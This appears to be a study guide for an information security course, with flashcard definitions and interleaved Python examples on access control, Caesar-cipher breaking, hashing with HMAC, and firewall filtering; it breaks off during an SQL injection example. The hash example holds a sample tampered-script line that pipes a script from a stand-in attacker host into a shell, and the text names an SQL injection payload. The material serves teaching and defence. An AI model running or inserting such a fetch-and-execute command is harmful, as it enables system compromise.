Exam (elaborations)

WGU C836 OA Study Guide (Overly Informative)

Pages
15
Uploaded on
16-12-2024
Written in
2024/2025

CIA Triad - ANS Confidentiality, Integrity, Availability.

Parkerian hexad - ANS Where the CIA triad consists of confidentiality, integrity, and availability, the Parkerian hexad consists of these three principles plus possession or control, authenticity, and utility.

Confidentiality - ANS Our ability to protect our data from those who are not authorized to view it. Confidentiality can be compromised by the loss of a laptop containing data, a person looking over our shoulder while we type a password, an e-mail attachment being sent to the wrong person, an attacker penetrating our systems, or similar issues.

Integrity - ANS The ability to prevent our data from being changed in an unauthorized or undesirable manner. This could mean the unauthorized change or deletion of our data or portions of it, or an authorized but undesirable change or deletion. To maintain integrity we need not only the means to prevent unauthorized changes but also the ability to reverse authorized changes that need to be undone.

Availability - ANS The ability to access our data when we need it. Loss of availability can come from a break anywhere in the chain that gives us access to our data: power loss, operating system or application problems, network attacks, compromise of a system, or other problems. When such issues are caused deliberately by an outside party such as an attacker, they are commonly referred to as a denial of service (DoS) attack.

Possession or Control - ANS The physical disposition of the media on which the data is stored. This lets us discuss loss of the data in its physical medium without involving other factors such as availability. Example: data stored on several devices in numerous versions; if one of those devices is lost or stolen we have lost possession of that copy, and control over who reads it, even though the data is still available to us from the others.

Authenticity - ANS Attribution as to the owner or creator of the data in question. Authenticity can be enforced through the use of digital signatures.

Utility - ANS How useful the data is to us. Encrypted data whose key has been lost is still in our possession but has no utility.

Interception - ANS Interception attacks allow unauthorized users to access our data, applications, or environments and are primarily an attack against confidentiality. Interception might take the form of unauthorized file viewing or copying, eavesdropping on phone conversations, or reading e-mail, and can be conducted against data at rest or in motion. Properly executed, interception attacks can be very difficult to detect. Affects: confidentiality.

Interruption - ANS Interruption attacks cause our assets to become unusable or unavailable for our use, on a temporary or permanent basis. They mainly affect availability but can be an attack on integrity as well. A DoS attack on a mail server, for example, is classified as an availability attack. Affects: availability, and sometimes integrity.

Modification - ANS Modification attacks involve tampering with our asset. If we access a file in an unauthorized manner and alter the data it contains, we have affected the integrity of the data in that file. Affects: integrity, and availability if the tampering leaves the asset unusable.

Fabrication - ANS Fabrication attacks involve generating data, processes, communications, or other similar activities with a system. They primarily affect integrity but could be considered an availability attack as well. Inserting spurious records into a database is a fabrication attack. Affects: integrity and availability.

Threat - ANS Something that has the potential to cause harm.

Vulnerability - ANS A weakness that a threat can use to harm us.

Risk - ANS The likelihood that something bad will happen. A risk exists only where a threat matches a vulnerability.

Impact - ANS The harm that results if a risk materializes. The value of the asset is used to assess impact, and hence whether a risk is present and worth treating.

Something you know - ANS A password or PIN.

Something you are - ANS An authentication factor using biometrics, such as a fingerprint scanner.

Something you have - ANS An authentication factor that relies on possession (fob, smart card, cell phone, key).

Something you do - ANS An authentication factor based on an action, such as gestures on a touch screen.

Multifactor Authentication - ANS Uses two or more different factors (for example a password plus a hardware token) for access. Two passwords are still only one factor.

Mutual Authentication - ANS A security mechanism that requires each party in a communication to verify the other's identity. It can be combined with multifactor authentication. Not only does the client authenticate to the server, the server also authenticates to the client. Mutual authentication is often implemented with digital certificates: both the client and the server hold a certificate with which to authenticate the other.

Biometric: Universality - ANS The characteristic is present in the majority of the people we expect to enroll in the system.

Biometric: Uniqueness - ANS A measure of how unique a particular characteristic is among individuals.

Biometric: Permanence - ANS How well a particular characteristic resists change over time and with advancing age.

Biometric: Collectability - ANS How easy it is to acquire a characteristic with which we can later authenticate a user.

Biometric: Performance - ANS The set of metrics that judge how well a given system functions, such as speed, accuracy, and error rate.

Biometric: Acceptability - ANS A measure of how acceptable the particular characteristic is to the users of the system.

Biometric: Circumvention - ANS The ease with which a system can be tricked by a falsified biometric identifier.

Risk Management Process - ANS 1. Identify assets. 2. Identify threats. 3. Assess vulnerabilities. 4. Assess risks. 5. Mitigate risks.

Logical Controls - ANS Sometimes called technical controls; these protect the systems, networks, and environments that process, transmit, and store our data.

Physical Controls - ANS Controls that protect the organization's people and physical environment, such as locks, fire management, gates, and guards; physical controls may be called "operational controls" in some contexts.

Administrative Controls - ANS Procedures implemented to define the roles, responsibilities, policies, and administrative functions needed to manage the control environment.

Incident Response Process - ANS
1. Preparation: the policies and procedures that govern incident response and handling are in place, and training and education have been conducted for both incident handlers and users.
2. Detection and Analysis: detect the occurrence of an issue and decide whether or not it is actually an incident.
3. Containment, Eradication, and Recovery: ensure that the situation does not cause any more damage, remove the cause, and restore normal operation.
4. Post-Incident Activity: determine specifically what happened, why it happened, and what we can do to keep it from happening again.

Principle of Least Privilege - ANS Allow a party (a person, user account, or process) only the bare minimum of access it needs to perform its function.

Discretionary Access Control (DAC) - ANS Model of access control in which access is determined by the owner of the resource in question. Example: a user who creates a network share and sets the permissions on that share.

Mandatory Access Control (MAC) - ANS Model of access control in which the owner of the resource does not get to decide who may access it; instead, access is decided by a group or individual with the authority to set access on resources.

Role-Based Access Control (RBAC) - ANS Model of access control in which permissions are attached to roles (for example "analyst" or "administrator") and users gain access by being assigned a role. Roles and their permissions are set by an authority responsible for doing so rather than by the owner of the resource.

Attribute-Based Access Control (ABAC) - ANS Model of access control in which decisions are based on attributes of the person, of the resource, or of the environment. Example: a VPN connection is set to time out after a certain period.

Multilevel Access Control - ANS An access control model with many tiers of security, used extensively by military and government organizations and by those that handle very sensitive data.

Confused Deputy Problem - ANS A type of attack common in systems that use ACLs rather than capabilities. It arises when software with access to a resource has a greater level of permission to that resource than the user controlling the software. If we, as the user, can trick the software into misusing its greater authority, we can potentially carry out an attack.

Client-side Attacks - ANS Attacks that take advantage of weaknesses in applications running on the computer operated directly by the user. They can take the form of code sent through the Web browser and then executed on the local machine, malformed PDF files, images or videos with attack code embedded, or other forms.

Cross-Site Request Forgery (CSRF or XSRF) - ANS An attack that misuses the authority of the browser on the user's computer. If the attacker knows of, or can guess, a Web site to which the user is probably already authenticated, perhaps a very common site, they can attempt a CSRF attack by embedding a link in a Web page or HTML-based e-mail, generally a link to an image hosted on the site to which they want to direct the user without their knowledge. When the browser fetches the image, it sends the request to that site along with the user's session cookies, so the site carries out whatever action the attacker encoded in the URL as if the user had asked for it.
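The DAC, MAC, RBAC and ABAC entries above describe the models but not how a decision is actually computed. The following is an added example, not code from the study guide or from the C836 textbook, showing a pure RBAC check (permissions hang off roles, never off users) and an ABAC layer on top of it that can veto a role-permitted action on the basis of session age, network location and department. The role names, permission tuples, classification labels and the eight-hour session timeout are all assumptions made up for the example.

```python
"""Added example: RBAC and ABAC authorization checks (constructed policy, not from the study guide)."""
from dataclasses import dataclass, field

# RBAC: permissions are attached to roles, never directly to users.
# The roles and (resource type, action) pairs below are assumed for the example.
ROLE_PERMISSIONS = {
    "viewer":  {("report", "read")},
    "analyst": {("report", "read"), ("report", "write")},
    "admin":   {("report", "read"), ("report", "write"), ("report", "delete"),
                ("user", "create")},
}


@dataclass
class Subject:
    name: str
    roles: set = field(default_factory=set)
    department: str = ""


@dataclass
class Resource:
    rtype: str
    owner_department: str
    classification: str = "internal"   # assumed labels: "public" | "internal" | "restricted"


@dataclass
class Environment:
    session_age_s: int            # seconds since the session authenticated
    on_corporate_network: bool


SESSION_TIMEOUT_S = 8 * 3600      # assumed policy value, like the VPN timeout in the ABAC example


def rbac_allows(subject: Subject, action: str, resource_type: str) -> bool:
    """Pure RBAC: allowed iff one of the subject's roles grants (resource type, action)."""
    return any((resource_type, action) in ROLE_PERMISSIONS.get(role, set())
               for role in subject.roles)


def abac_allows(subject: Subject, action: str, resource: Resource, env: Environment) -> bool:
    """ABAC layered over RBAC: attributes of the subject, the resource and the
    environment can deny an action that the role alone would permit."""
    # Environment attribute: a session older than the timeout is denied outright.
    if env.session_age_s > SESSION_TIMEOUT_S:
        return False
    # Resource attribute: restricted material is only reachable from the corporate network.
    if resource.classification == "restricted" and not env.on_corporate_network:
        return False
    # Subject/resource attribute match: changes are limited to the owning department.
    if action in ("write", "delete") and subject.department != resource.owner_department:
        return False
    # Nothing vetoed, so fall through to the role check (least privilege: default deny).
    return rbac_allows(subject, action, resource.rtype)


if __name__ == "__main__":
    fresh = Environment(session_age_s=600, on_corporate_network=True)
    alice = Subject("alice", {"analyst"}, "finance")
    report = Resource("report", "finance")
    print(abac_allows(alice, "write", report, fresh))   # True
    print(abac_allows(alice, "delete", report, fresh))  # False: analysts cannot delete
```

Note the ordering: every attribute rule can only deny, and the final answer still has to pass the role check, so adding ABAC conditions never widens access beyond what RBAC granted. That is the property a reviewer should look for in any layered policy.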
Clickjacking (User Interface Redressing) - ANS A client-side attack in which the attacker places an invisible layer over something on a web site the user would normally click on, so that the click carries out a command different from the one the user thinks they are performing.

Accountability - ANS The ability to tie actions to the party that took them. It depends on identification, authentication, authorization, and access control, and is evidenced through auditing.

Nonrepudiation - ANS A situation in which sufficient evidence exists to prevent an individual from successfully denying that they made a statement or took an action.

Intrusion Detection - ANS Monitors for malicious events and reports them.

Intrusion Prevention - ANS Raises an alarm and also takes action (dropping the traffic, blocking the source) when malicious events occur.

Auditing - ANS The primary means of ensuring accountability through technical means.

Penetration Test - ANS Mimics, as closely as possible, the techniques an actual attacker would use.

Nessus - ANS A vulnerability scanning (vulnerability assessment) tool.

Caesar Cipher - ANS A letter-by-letter substitution cipher: each letter is replaced by the letter a fixed number of positions further along the alphabet, wrapping around at the end. With the classic shift of 3, "a" is written "d" and "z" is written "c". Because the algorithm is known and there are only 25 possible shifts, it is trivially broken by trying them all.

Cryptographic Machines - ANS 1. The Jefferson Disk, by Thomas Jefferson. 2. The Enigma, by Arthur Scherbius.

Kerckhoffs' Principle - ANS Six requirements for a military cipher system: 1. The system must be practically, if not mathematically, undecipherable. 2. It must not require secrecy, and it must be no problem if it falls into enemy hands; only the key is secret. 3. It must be easy to communicate and remember the keys without written notes, and easy to change or modify the keys between participants. 4. The system ought to be compatible with telegraph communication. 5. It must be portable, and its use must not require more than one person. 6. Finally, given the circumstances in which it is applied, it must be easy to use and must require neither mental strain nor knowledge of a long series of rules. The second requirement is the one usually meant by "Kerckhoffs' principle" today.

Symmetric Cryptography - ANS Encryption that uses a single shared key both to encrypt and to decrypt a message. Fast, but the key must be delivered to the other party over a secure channel.
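The Caesar cipher, Kerckhoffs' second requirement and cryptanalysis come together in one short program. The following is an added example, not code from the study guide or its textbook: it implements the shift cipher as a symmetric operation (one key, the shift, encrypts and decrypts), then breaks a ciphertext without the key by trying all 25 shifts and scoring each candidate against English letter frequencies with a chi-squared statistic. The frequency table is the standard approximate English distribution; the sample message is constructed for the example.

```python
"""Added example: Caesar cipher plus brute-force cryptanalysis (not from the study guide)."""
import string

ALPHABET = string.ascii_lowercase

# Approximate English letter frequencies (percent), used to score candidate plaintexts.
ENGLISH_FREQ = {
    'a': 8.167, 'b': 1.492, 'c': 2.782, 'd': 4.253, 'e': 12.702, 'f': 2.228, 'g': 2.015,
    'h': 6.094, 'i': 6.966, 'j': 0.153, 'k': 0.772, 'l': 4.025, 'm': 2.406, 'n': 6.749,
    'o': 7.507, 'p': 1.929, 'q': 0.095, 'r': 5.987, 's': 6.327, 't': 9.056, 'u': 2.758,
    'v': 0.978, 'w': 2.360, 'x': 0.150, 'y': 1.974, 'z': 0.074,
}


def caesar_encrypt(plaintext: str, shift: int) -> str:
    """Replace every ASCII letter by the letter `shift` positions further along the
    alphabet, wrapping at 'z'. Case is preserved; other characters pass through."""
    out = []
    for ch in plaintext:
        if ch.isalpha() and ch.isascii():
            base = ord('A') if ch.isupper() else ord('a')
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return ''.join(out)


def caesar_decrypt(ciphertext: str, shift: int) -> str:
    # Decryption is encryption with the opposite shift: one key does both jobs (symmetric).
    return caesar_encrypt(ciphertext, -shift)


def chi_squared_vs_english(text: str) -> float:
    """Chi-squared distance between the letter counts of `text` and what English would
    produce for the same length. Lower is more English-like."""
    letters = [c for c in text.lower() if c in ENGLISH_FREQ]
    n = len(letters)
    if n == 0:
        return float('inf')
    score = 0.0
    for letter, pct in ENGLISH_FREQ.items():
        expected = pct / 100 * n
        observed = letters.count(letter)
        score += (observed - expected) ** 2 / expected
    return score


def break_caesar(ciphertext: str) -> tuple[int, str]:
    """Kerckhoffs in practice: the algorithm is public, so only the key protects the
    message, and there are just 25 keys. Try each and keep the most English-looking."""
    shift = min(range(1, 26),
                key=lambda k: chi_squared_vs_english(caesar_decrypt(ciphertext, k)))
    return shift, caesar_decrypt(ciphertext, shift)


if __name__ == "__main__":
    # Constructed sample order; long enough for letter statistics to be meaningful.
    message = ("The enemy will attack the eastern gate at dawn. Hold the reserves behind "
               "the river until the signal fire is lit, then advance and secure the bridge.")
    ciphertext = caesar_encrypt(message, 3)
    print(ciphertext)
    print(break_caesar(ciphertext))   # (3, message)
```

The scoring step is what makes the attack automatic rather than a human reading 25 candidates; the same frequency test is the first move against any monoalphabetic substitution, which is why "practically undecipherable" in Kerckhoffs' first requirement rules this whole family out.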
Block Cipher - ANS Takes a predetermined number of bits from the plaintext, known as a block (typically 64 or 128 bits), and encrypts that block as a unit.

Stream Cipher - ANS Encrypts the plaintext one bit (or one byte) at a time.

Symmetric Key Algorithms - ANS DES, 3DES, and AES.

Symmetric Key Algorithms: DES - ANS A symmetric block cipher with a 56-bit key. No longer considered secure: the key space is small enough to search exhaustively.

Symmetric Key Algorithms: 3DES - ANS Applies DES three times with two or three independent keys to lengthen the effective key; slow, and now deprecated in favor of AES.

Symmetric Key Algorithms: AES - ANS Uses three ciphers, with 128-, 192-, and 256-bit keys, all with a block length of 128 bits.

Asymmetric Cryptography - ANS Uses two keys, a public key and a private key. The public key is shared with everyone and is used to encrypt data sent to the key's owner; the private key is carefully guarded by the owner and is used to decrypt. For signing the roles reverse: the private key signs and the public key verifies.

Asymmetric Key Algorithms - ANS 1. RSA, by Ron Rivest, Adi Shamir, and Leonard Adleman. 2. Elliptic Curve Cryptography (ECC). 3. ElGamal. 4. Diffie-Hellman key exchange. 5. The Digital Signature Standard (DSS/DSA). These are the building blocks of protocols such as Pretty Good Privacy (PGP), Transport Layer Security (TLS, which secures browser connections to Web servers), and secure Voice over IP (VoIP); the protocols themselves are not asymmetric algorithms.

Hash Function - ANS Creates a fixed-length value that is, for practical purposes, unique to the input message. It is one-way: the message cannot be recovered from its hash. Hashes provide integrity, not confidentiality. They are very useful when distributing files or sending communications: the hash is sent with the message so the receiver can verify that it was not altered in transit.

Digital Signatures - ANS Ensure that the message was legitimately sent by the expected party and prevent the sender from denying that they sent it (nonrepudiation). A signature is produced by hashing the message and encrypting the hash with the signer's private key; anyone with the matching public key can verify it.

Certificates - ANS Link a public key to a particular individual (or host) and are often used as a form of electronic identification for that party. They are issued and signed by a certificate authority.
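The hash and digital-signature entries above are best understood by watching the check pass and fail. The following is an added example, not code from the study guide or its textbook, built only on the standard library. It shows a SHA-256 integrity check catching a modified file, then the case the entries gloss over: an attacker who controls both the download and the digest published next to it passes the check, because a bare hash says nothing about who produced the data. Binding the digest to a party needs a key the attacker does not hold; the page's answer is a digital signature, and since that needs a third-party library, an HMAC with a shared key is used here as a stand-in (it gives authenticity but, unlike a signature, no nonrepudiation, since anyone with the shared key can produce the tag). The install script, the attacker hostname and the key are constructed for the example.

```python
"""Added example: what a hash does and does not guarantee (constructed data, not from the study guide)."""
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def digest_matches(data: bytes, published_digest: str) -> bool:
    """Integrity check: recompute the hash and compare in constant time."""
    return hmac.compare_digest(sha256_hex(data), published_digest)


# A constructed "release": an install script and the digest the publisher announces next to it.
ORIGINAL = b"#!/bin/sh\necho 'installing agent'\n"
PUBLISHED_DIGEST = sha256_hex(ORIGINAL)

# What an attacker who can rewrite the download would ship instead (hostname made up).
TAMPERED = ORIGINAL + b"curl -s http://attacker.example/backdoor.sh | sh\n"


def integrity_detects_tampering() -> bool:
    """Attacker altered the file but could not alter the digest the publisher announced
    out of band (on a web page, in an e-mail): the mismatch is detected."""
    return not digest_matches(TAMPERED, PUBLISHED_DIGEST)


def hash_alone_is_not_authenticity() -> bool:
    """Same attacker, but the digest sits on the same mirror as the file, so they replace
    both. The check passes: a bare hash proves integrity, not origin."""
    return digest_matches(TAMPERED, sha256_hex(TAMPERED))


# Keyed stand-in for a signature. The key is assumed to be known only to publisher and
# verifier; a real release would use a private signing key and a public verification key.
PUBLISHER_KEY = b"assumed-secret-shared-with-verifier"   # made up for the example


def tag(data: bytes, key: bytes = PUBLISHER_KEY) -> str:
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def tag_matches(data: bytes, published_tag: str, key: bytes = PUBLISHER_KEY) -> bool:
    return hmac.compare_digest(tag(data, key), published_tag)


def keyed_check_defeats_substitution() -> bool:
    """The attacker can still swap the file and recompute a plain hash, but cannot forge a
    tag without the key, so the tampered file fails verification."""
    forged = tag(TAMPERED, b"attacker-guess")
    return tag_matches(ORIGINAL, tag(ORIGINAL)) and not tag_matches(TAMPERED, forged)


if __name__ == "__main__":
    print(integrity_detects_tampering())        # True
    print(hash_alone_is_not_authenticity())     # True: the weakness
    print(keyed_check_defeats_substitution())   # True
```

`hmac.compare_digest` is used for every comparison, including the plain hash, because a naive `==` on hex strings returns early at the first differing character and leaks timing information to a remote caller.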
Protecting Data at Rest - ANS Data is at rest when it sits on a storage device (disks, backup tapes, laptops, removable media). Security here is often lax, and it is a particularly bad place to choose not to emphasize security, since stored media is what gets lost or stolen; encryption of the storage is the main control.

Protecting Data in Motion - ANS Data is in motion when it is actively being transported over a network: a closed WAN or LAN, a wireless network, the Internet, or other paths. TLS (and its deprecated predecessor SSL) is the usual protection for information sent over networks and the Internet.

Protecting Data in Use - ANS Data is in use when a user or process is actively working with it, which normally means it is decrypted in memory; this is the hardest state to protect.

Cipher - ANS An algorithm used for cryptographic purposes.

Cryptanalysis - ANS The science of breaking encryption without being given the key.

Federal Information Security Management Act, updated as the Federal Information Security Modernization Act (FISMA) - ANS Ensures the protection of information, operations, and assets in the federal government. Requires each federal agency to develop, document, and implement an information security program to protect its information and information systems. Annual reviews of these programs are required to maintain compliance and keep security risks at an acceptable level.

Health Insurance Portability and Accountability Act (HIPAA) - ANS Sets limits on the use and disclosure of patient information without authorization, and grants individuals rights over their own health records.

Family Educational Rights and Privacy Act (FERPA) - ANS Protects the privacy of students and their parents. It also regulates the disclosure and maintenance of educational records, including educational information, personally identifiable information, and directory information. FERPA also grants certain rights to students and parents regarding the student's own records.

Sarbanes-Oxley Act (SOX) - ANS Regulates the financial practice and governance of corporations. Protects investors and the general public by establishing requirements for reporting and disclosure practices. The act mandates standards in areas such as corporate board responsibility, auditor independence, fraud accountability, internal controls assessment, and enhanced financial disclosures.

Gramm-Leach-Bliley Act (GLBA) - ANS Protects the customers of financial institutions, essentially any company offering financial products or services, financial or investment advice, or insurance. The GLBA Privacy Rule requires financial institutions to safeguard a consumer's "nonpublic personal information," or NPI. GLBA also mandates the disclosure of an institution's information collection and information sharing practices, and establishes requirements for providing privacy notices and opt-outs to consumers.

European Union's Data Protection Directive (Directive 95/46/EC) - ANS Requirements to protect individuals' personally identifiable information (PII). It was repealed and replaced by the General Data Protection Regulation (GDPR) in May 2018.

Regulatory Compliance - ANS The organizational goal of complying with the laws and regulations relevant to its industry. In many cases regulatory compliance comes packaged with cyclical audits and assessments to ensure that everything is being carried out according to specification.

Industry Compliance - ANS Regulations or standards that are usually not mandated by law but are designed for specific industries (e.g. PCI DSS).

Payment Card Industry Data Security Standard (PCI DSS) - ANS The set of standards with which companies that store, process, or transmit payment card data must comply; mandated by the card brands rather than by law.

Sun Tzu - ANS Chinese military general who lived in the sixth century BC. His work, The Art of War, provides some of the earliest plainly stated and clearly documented examples of operations security principles.

George Washington - ANS Known in the operations security community for having said, "Even minutiae should have a place in our collection, for things of a seemingly trifling nature, when enjoined with others of a more serious cast, may lead to valuable conclusion", meaning that even small items of information, worthless individually, can be of great value in combination. This is the foundation of OPSEC: the focus is on unclassified data that, once correlated, becomes data that should be classified.

Vietnam War, aka Purple Dragon - ANS During the Vietnam War the United States came to realize that information regarding troop movements, operations, and other military activities was being leaked to the enemy. The study that traced how, code-named Purple Dragon, produced the formal OPSEC methodology.

OPSEC - ANS A formal methodology of operations security.

Operations Security Process - ANS 1. Identification of critical information. 2. Analysis of threats. 3. Analysis of vulnerabilities. 4. Assessment of risks: match threats to vulnerabilities. 5. Application of countermeasures.

Haas's Laws of Operations Security - ANS First: "If you don't know the threat, how do you know what to protect?" Develop an awareness of both actual and potential threats. Second: "If you don't know what to protect, how do you know you are protecting it?" Evaluate our information assets and determine what exactly we consider our critical information; the same as step 1 of the OPSEC process, identification of critical information. Third: "If you are not protecting it (the information), ... THE DRAGON WINS!" The necessity of the operations security process.

Competitive Intelligence - ANS The process of intelligence gathering and analysis to support business decisions.
Physical Threats - ANS Extreme temperature, gases, liquids, living organisms, projectiles, movement, energy anomalies, people, toxins, smoke and fire.

Business Continuity Planning (BCP) - ANS The plans we put in place to ensure that critical business functions can continue operating through a state of emergency.

Disaster Recovery Planning (DRP) - ANS The plans we put in place in preparation for a potential disaster: what exactly we will do during and after a particular disaster strikes to replace infrastructure.

Deterrent - ANS Controls that discourage those who might seek to violate our security controls from doing so, whether the threat is external or internal. Violation of a policy could result in the employee being disciplined or fired; violation of a regulation or law could result in criminal or civil prosecution.

Detective - ANS Controls that detect and report undesirable events that are taking place.

Preventive - ANS Controls that physically prevent unauthorized entities from breaching our physical security.

Defense in depth - ANS Using a variety of security measures so that the defense still succeeds should one or more of the measures fail.

RAID - ANS Data storage virtualization technology that combines multiple physical disk drives into a single logical unit for the purposes of data redundancy, performance improvement, or both. Note that RAID protects availability against disk failure only; it is not a backup.

Packet Filtering - ANS Looks at each packet individually and makes a coarse allow/deny decision from its header fields: source and destination IP address, port, and protocol. It has no memory of earlier packets, so it cannot tell a genuine reply from an unsolicited packet crafted to look like one.

Stateful Packet Inspection - ANS Uses a state table to keep track of connection state and only allows traffic that either starts a new permitted connection or belongs to an already established one. The firewall watches the packets of a given connection over time rather than judging each in isolation.

Deep Packet Inspection - ANS Analyzes the actual content (payload) of the traffic flowing through the device, not just the headers, so it can spot malware or prohibited data inside otherwise permitted connections. It costs throughput, and for encrypted traffic it works only if the device terminates the TLS session.
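The difference between packet filtering and stateful inspection is easiest to see with the packets in hand. The following is an added example, not code from the study guide or its textbook: a stateless filter that judges each packet by its header fields alone, and a stateful filter that admits inbound packets only when they belong to a flow recorded in its state table. The stateless rule "allow inbound packets from source port 443" is the classic hole: it is the only way such a filter can let web replies back in, and an attacker simply sets their source port to 443. The address ranges, the published web server and the sample packets are constructed for the example.

```python
"""Added example: stateless packet filter vs stateful inspection (constructed packets, not from the study guide)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str = "tcp"
    syn: bool = False
    ack: bool = False


INTERNAL_PREFIX = "10.0.0."        # assumed: the protected LAN
WEB_SERVER = ("10.0.0.80", 443)    # assumed: the one service exposed to the outside


def is_internal(ip: str) -> bool:
    return ip.startswith(INTERNAL_PREFIX)


def stateless_allows(pkt: Packet) -> bool:
    """Packet filtering: every packet is judged on its own header fields.
    To let replies to outbound web browsing back in, the rule set has to blindly permit
    inbound packets whose *source* port is 443, which is exactly the hole an attacker uses."""
    if is_internal(pkt.src_ip):                      # outbound: permitted
        return True
    if (pkt.dst_ip, pkt.dst_port) == WEB_SERVER:     # inbound to the published web server
        return True
    if pkt.src_port == 443:                          # "must be a reply to our browsing"
        return True
    return False


class StatefulFilter:
    """Stateful packet inspection: a state table records flows started from the inside
    (or accepted to the web server), and other inbound packets are admitted only if they
    are the return half of a recorded flow. Real firewalls also age entries out and track
    TCP state transitions; this example does neither."""

    def __init__(self) -> None:
        self.table: set[tuple] = set()

    @staticmethod
    def _key(src_ip, src_port, dst_ip, dst_port, proto):
        return (src_ip, src_port, dst_ip, dst_port, proto)

    def allows(self, pkt: Packet) -> bool:
        if is_internal(pkt.src_ip):
            # New (or continuing) outbound flow: remember it so its replies are recognised.
            self.table.add(self._key(pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port, pkt.proto))
            return True
        if (pkt.dst_ip, pkt.dst_port) == WEB_SERVER and pkt.syn and not pkt.ack:
            # New inbound connection to the published service: record it with the server as
            # source so that later packets of the same flow match the lookup below.
            self.table.add(self._key(pkt.dst_ip, pkt.dst_port, pkt.src_ip, pkt.src_port, pkt.proto))
            return True
        # Anything else from outside must be the return half of a known flow.
        reverse = self._key(pkt.dst_ip, pkt.dst_port, pkt.src_ip, pkt.src_port, pkt.proto)
        return reverse in self.table


if __name__ == "__main__":
    spoof = Packet("203.0.113.9", 443, "10.0.0.5", 3389, syn=True)   # attacker -> internal RDP
    print(stateless_allows(spoof))                                    # True: the hole
    fw = StatefulFilter()
    print(fw.allows(spoof))                                           # False: no such flow
```

The stateful filter still has to decide what counts as "new": here only outbound flows and SYNs to the web server may create state. A common misconfiguration is to let any inbound packet with ACK set create an entry, which reopens the same hole by a different name.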
Proxy Server - ANS Serves as a choke point that lets us filter traffic for attacks or undesirable content, such as malware or traffic to Web sites hosting adult content. Proxies also let us log the traffic that passes through them for later inspection, and they provide a layer of security for the devices behind them by acting as the single source of requests to the outside.

Demilitarized Zone (DMZ) - ANS A separate organizational local area network located between an organization's internal network and an external network, usually the Internet, where externally reachable servers are placed.

Intrusion Detection System (IDS) - ANS Monitors the networks, hosts, or applications to which it is connected for unauthorized activity.

Network Intrusion Detection System (NIDS) - ANS A type of IDS that attempts to detect malicious network activity, for example port scans and DoS attacks, by constantly monitoring network traffic. The sensor is installed only at specific points, such as the boundary between the outside environment and the network segment to be protected.

Host Intrusion Detection System (HIDS) - ANS A software-based application that runs on a local host and can detect an attack as it occurs. Host-based protections such as firewalls, antivirus software, and spyware-detection programs are installed on every computer that has two-way access to an outside environment such as the Internet.

Application Protocol Intrusion Detection System (APIDS) - ANS Focuses its monitoring and analysis on a specific application protocol or protocols in use by the computing system.

Virtual Private Network (VPN) - ANS An encrypted connection, or tunnel, between two points.

Secure Protocols - ANS Secure Shell (SSH) and SSH File Transfer Protocol (SFTP), which encrypt both credentials and data.

Insecure Protocols - ANS File Transfer Protocol (FTP) and Post Office Protocol (POP), which send credentials and data in clear text; replace them with SFTP and POP3 over TLS.

Mobile Device Management (MDM) - ANS The toolset a corporation uses to centrally manage and remotely control the smartphones and tablets it provides to its employees, ensuring data security (enforcing encryption and passcodes, remote wipe).

Bring Your Own Device (BYOD) - ANS A policy that allows employees to use their personal mobile devices and computers to access enterprise data and applications.

Port Scanners - ANS Software-based security tools designed to search a network host for open ports on a TCP/IP-based network. Example: Nmap (network mapper).

Packet Sniffers - ANS Tools that capture and inspect packets as they travel across computer networks.

Honeypots - ANS Tempting, bogus targets meant to lure attackers so that their activity can be observed.

Hping3 - ANS A packet-crafting tool used, among other things, to test the security of firewalls.

Kismet - ANS A sniffer that specializes in detecting wireless devices; used to find unauthorized wireless access points.

Nmap - ANS A versatile tool able to scan ports, search for hosts on the network, identify services and operating systems, and perform other operations.

Tcpdump - ANS A command-line packet sniffing tool that runs on Linux and UNIX operating systems.

Wireshark - ANS A graphical protocol analyzer capable of filtering, sorting, and analyzing both wired and wireless network traffic.

Hardening categories - ANS 1. Remove unnecessary software. 2. Remove or turn off unessential services. 3. Make alterations to common accounts (rename or disable default accounts, change default passwords). 4. Apply the principle of least privilege. 5. Apply software updates in a timely manner. 6. Make use of logging and auditing functions.

Port 22 - ANS SSH.

Port 53 - ANS DNS.

Port 80 - ANS HTTP.

Port 443 - ANS HTTPS.

Executable Space Protection - ANS An operating-system feature (DEP on Windows, backed by the NX/XD bit in hardware) that marks memory regions holding data, such as the stack and heap, as non-executable, so that code injected through a buffer overflow or the other techniques commonly used by malware cannot be run from there.

Nessus - ANS A vulnerability assessment tool (see the Nessus entry above).

Exploit Frameworks - ANS Metasploit, CANVAS.

Attack surface - ANS The total of the available avenues through which our operating system or application might be attacked.

Buffer overflows - ANS Occur when a program writes more data into a fixed-size memory buffer than it can hold because it did not properly account for the size of the input; the excess overwrites adjacent memory and can redirect execution. Proper bounds checking nullifies this type of attack entirely.

Race conditions - ANS A vulnerability that occurs when an ordered or timed set of operations is disrupted or altered by an exploit. Race conditions arise when multiple processes, or multiple threads within a process, control or share access to a particular resource and the correct handling of that resource depends on the proper ordering or timing of transactions. They can be very difficult to detect in existing software because they are hard to reproduce.

Input Validation Attacks - ANS When an attacker purposefully sends strange or malformed input to confuse a web application. Input validation routines are the first line of defense against such attacks. Examples include buffer overflow, directory traversal, cross-site scripting, and SQL injection.

Authorization Attacks - ANS Attacks that exploit weaknesses in how an application decides what an authenticated user is permitted to do, for example by trusting authorization decisions made on the client side, where the attacker can alter them.

Cryptographic Attacks - ANS Exploiting the security of a cryptographic system by finding a weakness in a code, cipher, cryptographic protocol, or key management scheme.

Authentication Attacks - ANS Target and attempt to exploit the authentication process a web site uses to verify the identity of a user, service, or application.
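The Input Validation Attacks entry names SQL injection as one consequence of missing validation; the following is an added example, not code from the study guide or its textbook, that shows the failure and both fixes against a constructed in-memory SQLite table. The vulnerable login builds its query by string formatting, so a username of `alice' --` closes the quote and comments out the password check. The safe version sends the values as parameters, and an allowlist check on the username rejects the payload before it reaches any query at all. The table contents, the payloads and the username pattern are constructed for the example; passwords are stored in clear only to keep it short.

```python
"""Added example: SQL injection through missing input validation, and its fixes (constructed DB, not from the study guide)."""
import re
import sqlite3

# Allowlist for what a username may look like (assumed policy for the example).
USERNAME_RE = re.compile(r"[a-z0-9_]{1,32}")


def setup_db() -> sqlite3.Connection:
    """In-memory table with constructed rows. A real system stores salted password hashes."""
    conn = sqlite3.connect(":memory:")
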